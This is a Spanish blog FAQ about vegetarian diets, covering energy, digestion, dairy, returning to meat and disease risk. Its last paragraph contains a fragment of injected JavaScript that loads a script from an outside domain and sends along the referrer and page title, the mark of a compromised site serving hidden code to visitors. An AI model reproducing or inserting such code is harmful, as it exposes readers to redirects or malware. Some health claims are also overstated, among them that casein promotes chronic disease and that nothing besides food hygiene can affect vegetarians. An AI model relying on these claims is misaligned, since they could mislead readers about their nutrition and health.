Salud y belleza » Alimentación

Preguntas frecuentes de un vegetariano II

Sin Comentarios

¿Obtendré suficiente energía con la dieta vegetariana?

Pues claro. Si se planea de forma inteligente, la dieta vegetariana provee tanta energía como cualquier otro plan alimentario. Esta comprobado que el organismo humano obtiene sus energías de los carbohidratos, y los productos vegetales tienen muchos más carbohidratos comparados con las carnes y lácteos. La fruta, el cereal y las verduras, entonces, representan más energía para el cuerpo que cualquier otro alimento.

¿La digestión de un vegetariano es igual a la de cualquier otro individuo?

No: es todavía mejor. El proceso digestivo de quienes consumen carnes y lácteos suele ser más pesado pues el organismo tiene mayores dificultades para procesar esos alimentos que las comidas vegetarías. Aquellos que se nutren de productos de origen vegetal, usarán menos energía en la digestión y tardarán menos tiempo en hacerla.

¿Es verdad que un vegetariano debe controlar su consumo de lácteos?

Más o menos. A decir verdad, está comprobado que los lácteos contienen una proteína llamada caseína la cual está diseñada por la naturaleza para que las crías de ganado inicien su crecimiento de unos cuantos kilogramos a cientos de kilogramos.
Es así como esta sustancia ayuda al crecimiento de los tejidos humanos también pero, al mismo tiempo, como punto negativo y contraproducente, puede que en el organismo de los vegetarianos se estimulen ciertas enfermedades crónicas.
La mayoría de los individuos que son vegetarianos creen que deben tomar leche y lácteos para suplir los nutrientes de las carnes y lograr que sus huesos obtengan calcio, sin embargo hay muchas fuentes de calcio en el mundo vegetal y entre ellas hay varios alimentos que aportan más calcio que los lácteos.

¿Qué ocurre si debo que comer carne o lácteos después de acostumbrarme a los alimentos vegetales?

A nivel físico, nada. No te sentirás mal al comer carne, ni tampoco sentirás el rechazo de tu cuerpo. Aquí hablamos, principalmente, de creencias dadas por una ideología en particular. Si tienes la necesidad de, en algún momento, retomar tu dieta de carnes podrás volverlo a hacer sin problemas. Aún así, vale destacar que al comer carne o lácteos por simple gusto, estás retrocediendo en los beneficios de la dieta vegetariana e incurriendo en los riesgos de la dieta animal, por lo tanto todo tu plan alimenticio debería ser planificado nuevamente (para que no queden baches en él).

¿Los vegetarianos tienen mayor predisposición a pillar enfermedades que otras personas?

No, no existe tal cosa. El único cuidado que deben tener los vegetarianos es, principalmente, la higiene de los alimentos pues al consumir tanta fruta y verdura tenemos el riesgo de, al no lavarla de forma correcta, pillar alguna patología. Pero, salvo esos cuidados, nada más puede afectar a un vegetariano (de hecho, las carnes portan más agentes negativos que las frutas y verduras).}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.